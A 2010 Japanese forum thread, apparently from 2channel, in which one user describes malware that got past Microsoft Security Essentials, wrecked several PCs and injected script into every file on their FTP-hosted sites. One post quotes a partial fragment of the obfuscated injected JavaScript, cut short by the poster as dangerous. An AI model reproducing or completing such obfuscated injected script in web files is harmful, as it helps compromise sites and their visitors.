- ■■最強で無料の Microsoft Security Essentials
847 :名無し~3.EXE[sage]:2010/05/18(火) 11:50:13 ID:CtVzg7QP - 一昨日からSecurity Essentials入れてるネットワーク内の
パソコン数台がウイルスに感染してパソコン内のデータ
壊されまくったんだけど・・・
あわてて他のパソコンはノートンやらバスターやら入れて
みたけど、今のところ被害拡大はない。
Security Essentials入れていて、まったく使っていない
メールもブラウザも開いていないパソコンを
起動しっぱなしにしてみたら、やはり感染してしまい、
CPU100%&デスクトップ上に様々なメッセージが表示されまくり。
例えば以下のメッセージ。
your system is infected!
system has been stopped due to a serious malfunction. spyware activity has been detected.
It is recommeded to use spyware removal tool to prevent data loss. Do not use the computer before all spyware removed.
Security Essentialsも、数分毎に検出と削除を繰り返してるが、
処理が間に合わず、ほっとおくと、しまいには
パソコンが起動できなくなってしまう。
このソフト、ネットワークウイルスにめちゃもろいんとちゃうの?
みなは大丈夫なの?
はぁ・・・、復旧不可能になってしまった数台のパソコンの
OSクリーンインストールで疲れたわ・・・
十年以上、他のセキュリティソフト使ってきたけど、こんなんなったの
初めてだわ。Security Essentials入れて大失敗orz
|
- ■■最強で無料の Microsoft Security Essentials
850 :名無し~3.EXE[sage]:2010/05/18(火) 13:59:44 ID:CtVzg7QP - 製品名には2010とは出ていなくて、
偽者が出回ってる情報も知っていたんで、
ダウンロードする時はマイクロソフトのドメイン名の部分を
しっかり確認したつもりなんんだけど・・・偽の可能性あるかな?
Security Essentialsが出た当時から今までは普通に大丈夫だった
んだけど。普通のウイルスもしっかり検出してたし、
今回のネットワークウイルスにだけ対応できていない感じ・・・
|
- ■■最強で無料の Microsoft Security Essentials
853 :名無し~3.EXE[sage]:2010/05/18(火) 14:09:04 ID:CtVzg7QP - Linuxでもノーガードは無謀なのにねw
|
- ■■最強で無料の Microsoft Security Essentials
856 :名無し~3.EXE[sage]:2010/05/18(火) 15:09:14 ID:CtVzg7QP - >>854のアドレスから入れてみたけど、同じように検出と削除を繰り返し、
抑えきれていない。
そして、今気がついたんだが、ここ一ヶ月以内に
FTPでウェブにアップしてあるファイルが全てウイルスに感染してる
ではないか。知らぬうちにウイルスばら撒いていたことになるな・・・
セキュリティエッセンシャルでそのページ確認してもまったく無反応。
ノートン入れたPCで確認すると
『コンピューターを攻撃しようとする最近の試みを遮断しました。』
と表示される。
http://www.plala.or.jp/member/option_service/secuplus/hp_vcheck/
ぷららのホームページウイルスチェックサービス(トレンドマイクロのシステム)
でアクセスしても無反応。
ウイルスバスターも、Security Essentialsも最悪・・・
ということは、
長期間、PC内部で潜伏していて、数日前から一気に悪さを始めたということだな!
その間に入力した様々な情報や、パソコン内部のデータが漏れている
可能性も大だな・・・
はぁ・・・扱ってる情報が莫大すぎて気が遠くなるわ・・・
|
- ■■最強で無料の Microsoft Security Essentials
858 :名無し~3.EXE[sage]:2010/05/18(火) 15:28:59 ID:CtVzg7QP - >>857
重い&バクてんこ盛りウイルスバスターに嫌気がさして、
Security Essentialsにしたんだが、
結局は無料ソフトを信じきった俺が悪いんだな・・・はぁ・・・
|
- ■■最強で無料の Microsoft Security Essentials
861 :名無し~3.EXE[sage]:2010/05/18(火) 20:55:49 ID:CtVzg7QP - >>859
<script>var P=14929;var X=new Date();var fL=["s"];
M={sz:52107};var O={XN:false};var F=document;
var i;var e=RegExp;var a="a";var q=window;
var nf=9978;var o=null;var sB="sB";var t=[];var iH=[];
function k(){this.ac=44734;this.ac-=36;var HS=["l"];
function Q(FJ,m,v){var R='';return FJ.substr(m,v);}
Rf={};var H=new String(Q("scripkVuK",0,5)+"t");
var b=[];var C=new String("]");var iC="";Ts=42660;
Ts-=39;var C=Q("]A4FQ",0,1);
mg=["QB","qt","OX"];var G='';var vi={uU:37688};var h=new Date();
var K=new String("bo"+Q("dyRKtV",0,2));
Fc=37737;Fc--;wR=[];var xS='';
function A(FJ,m){this.mq="";var v=String(Q("[Vi6x",0,1));var bZ=new Date();
v+=m;var jQ=["MA"];this.Yb=false;v+=C;var qZ={jb:35084};
危険なんで一部のみ記載。
勝手にFTPに登録されている全てのサイトのファイルに
上記攻撃用JavaScriptを埋め込んであった。
こんなことされて検出されていないって・・・
んで、上記JavaScriptは http://www.gred.jp/ ここでも安全扱いされている。
今のところノートン以外での検出は確認できていない。
完全にノートンに移ります。
全てのサイトのファイルアップしなおすには
数十万ファイルある・・・
SSHでアップできるサーバーなら一瞬で全てのファイルを元の状態に戻せるが、
それ以外のサイトは手作業になるから、これだけでも気が重くなりますわ・・・
|
- ■■最強で無料の Microsoft Security Essentials
863 :名無し~3.EXE[sage]:2010/05/18(火) 21:06:53 ID:CtVzg7QP - 訂正。
JavaScript×
Script○
これだけでなく、コンピューター上の様々なファイルが変更されてるだろうな・・・
みなも、重要なデータ入れてるパソコンだけは、しっかりしたもの入れたほうがいいよ。
経験者より。
|